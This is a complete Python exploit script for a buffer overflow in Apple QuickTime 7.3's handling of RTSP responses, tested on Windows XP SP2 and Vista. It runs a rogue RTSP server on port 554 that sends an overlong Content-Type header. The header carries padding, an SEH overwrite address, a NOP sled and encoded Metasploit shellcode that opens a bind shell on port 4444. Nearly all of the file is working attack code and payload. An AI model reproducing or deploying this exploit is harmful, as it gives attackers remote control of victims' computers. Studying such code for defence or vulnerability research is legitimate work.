#!/usr/bin/python
# Apple QuickTime 7.3 RTSP Response Vista / XPSP2 Universal
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Edited by muts -> offensive-security.com
# http://www.offensive-security.com
#
# Tested on XP SP2 and Vista EN QuickTime/7.3
#


from socket import *

header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')

body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */

shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x69"
"\x58\x50\x30\x41\x31\x41\x42\x6b\x42\x41\x79\x32\x42\x42\x32\x41"
"\x41\x42\x30\x41\x41\x58\x38\x42\x42\x50\x75\x39\x79\x4b\x4c\x51"
"\x7a\x5a\x4b\x32\x6d\x38\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x75"
"\x30\x4e\x6b\x30\x6c\x36\x44\x56\x44\x4c\x4b\x57\x35\x77\x4c\x6e"
"\x6b\x41\x6c\x76\x65\x50\x78\x34\x41\x58\x6f\x4e\x6b\x70\x4f\x54"
"\x58\x6e\x6b\x33\x6f\x71\x30\x64\x41\x48\x6b\x43\x79\x6e\x6b\x67"
"\x44\x4e\x6b\x46\x61\x7a\x4e\x64\x71\x4f\x30\x7a\x39\x4c\x6c\x4b"
"\x34\x4b\x70\x50\x74\x57\x77\x48\x41\x79\x5a\x46\x6d\x66\x61\x6f"
"\x32\x48\x6b\x79\x64\x57\x4b\x36\x34\x45\x74\x34\x68\x74\x35\x4d"
"\x35\x4e\x6b\x71\x4f\x77\x54\x53\x31\x6a\x4b\x65\x36\x4c\x4b\x76"
"\x6c\x52\x6b\x4c\x4b\x33\x6f\x37\x6c\x75\x51\x5a\x4b\x47\x73\x34"
"\x6c\x4e\x6b\x4d\x59\x50\x6c\x44\x64\x75\x4c\x30\x61\x68\x43\x46"
"\x51\x6b\x6b\x62\x44\x6e\x6b\x70\x43\x74\x70\x6e\x6b\x71\x50\x66"
"\x6c\x4e\x6b\x32\x50\x57\x6c\x4e\x4d\x4c\x4b\x41\x50\x73\x38\x53"
"\x6e\x53\x58\x6c\x4e\x30\x4e\x64\x4e\x48\x6c\x76\x30\x4b\x4f\x6b"
"\x66\x35\x36\x50\x53\x43\x56\x43\x58\x57\x43\x30\x32\x51\x78\x53"
"\x47\x62\x53\x74\x72\x41\x4f\x41\x44\x4b\x4f\x6a\x70\x43\x58\x48"
"\x4b\x48\x6d\x4b\x4c\x35\x6b\x52\x70\x59\x6f\x38\x56\x41\x4f\x6d"
"\x59\x4a\x45\x61\x76\x4e\x61\x6a\x4d\x47\x78\x76\x62\x50\x55\x62"
"\x4a\x63\x32\x6b\x4f\x6e\x30\x61\x78\x4e\x39\x44\x49\x7a\x55\x4c"
"\x6d\x30\x57\x39\x6f\x4e\x36\x61\x43\x71\x43\x51\x43\x73\x63\x56"
"\x33\x73\x73\x66\x33\x73\x73\x61\x43\x79\x6f\x7a\x70\x70\x66\x65"
"\x38\x76\x71\x51\x4c\x43\x56\x36\x33\x4b\x39\x4a\x41\x4d\x45\x31"
"\x78\x39\x34\x47\x6a\x70\x70\x4a\x67\x33\x67\x6b\x4f\x4b\x66\x30"
"\x6a\x62\x30\x70\x51\x66\x35\x4b\x4f\x7a\x70\x35\x38\x4e\x44\x6e"
"\x4d\x54\x6e\x5a\x49\x66\x37\x49\x6f\x6b\x66\x73\x63\x70\x55\x6b"
"\x4f\x6a\x70\x65\x38\x5a\x45\x30\x49\x4d\x56\x47\x39\x31\x47\x39"
"\x6f\x4e\x36\x52\x70\x53\x64\x62\x74\x76\x35\x59\x6f\x58\x50\x4e"
"\x73\x61\x78\x6b\x57\x73\x49\x4b\x76\x43\x49\x63\x67\x4b\x4f\x59"
"\x46\x70\x55\x4b\x4f\x4a\x70\x50\x66\x72\x4a\x31\x74\x43\x56\x41"
"\x78\x50\x63\x62\x4d\x6f\x79\x48\x65\x33\x5a\x72\x70\x30\x59\x71"
"\x39\x68\x4c\x6d\x59\x48\x67\x61\x7a\x43\x74\x6d\x59\x4d\x32\x64"
"\x71\x4f\x30\x4c\x33\x4d\x7a\x4b\x4e\x51\x52\x36\x4d\x6b\x4e\x41"
"\x52\x64\x6c\x4a\x33\x6e\x6d\x31\x6a\x45\x68\x4e\x4b\x6e\x4b\x4e"
"\x4b\x61\x78\x44\x32\x49\x6e\x4c\x73\x66\x76\x39\x6f\x50\x75\x51"
"\x54\x49\x6f\x49\x46\x31\x4b\x31\x47\x70\x52\x46\x31\x70\x51\x46"
"\x31\x52\x4a\x47\x71\x43\x61\x62\x71\x53\x65\x36\x31\x79\x6f\x5a"
"\x70\x33\x58\x4c\x6d\x7a\x79\x45\x55\x6a\x6e\x76\x33\x59\x6f\x6a"
"\x76\x50\x6a\x4b\x4f\x79\x6f\x50\x37\x59\x6f\x7a\x70\x4c\x4b\x52"
"\x77\x4b\x4c\x4f\x73\x49\x54\x35\x34\x79\x6f\x6b\x66\x51\x42\x59"
"\x6f\x38\x50\x30\x68\x5a\x50\x4c\x4a\x66\x64\x51\x4f\x36\x33\x4b"
"\x4f\x78\x56\x6b\x4f\x38\x50\x69")


tmp = "A" * 991
tmp+= "\xeb\x32\x90\x90"
tmp+= "\xC8\xF3\x86\x66" # 6686F3C8
tmp+= "\x90" * 64
tmp+= shellcode
tmp+= "\x41"* int(4028-len(shellcode))


header %= (tmp, len(body))
evil = header + body

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
data=c.recv(1024)

c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
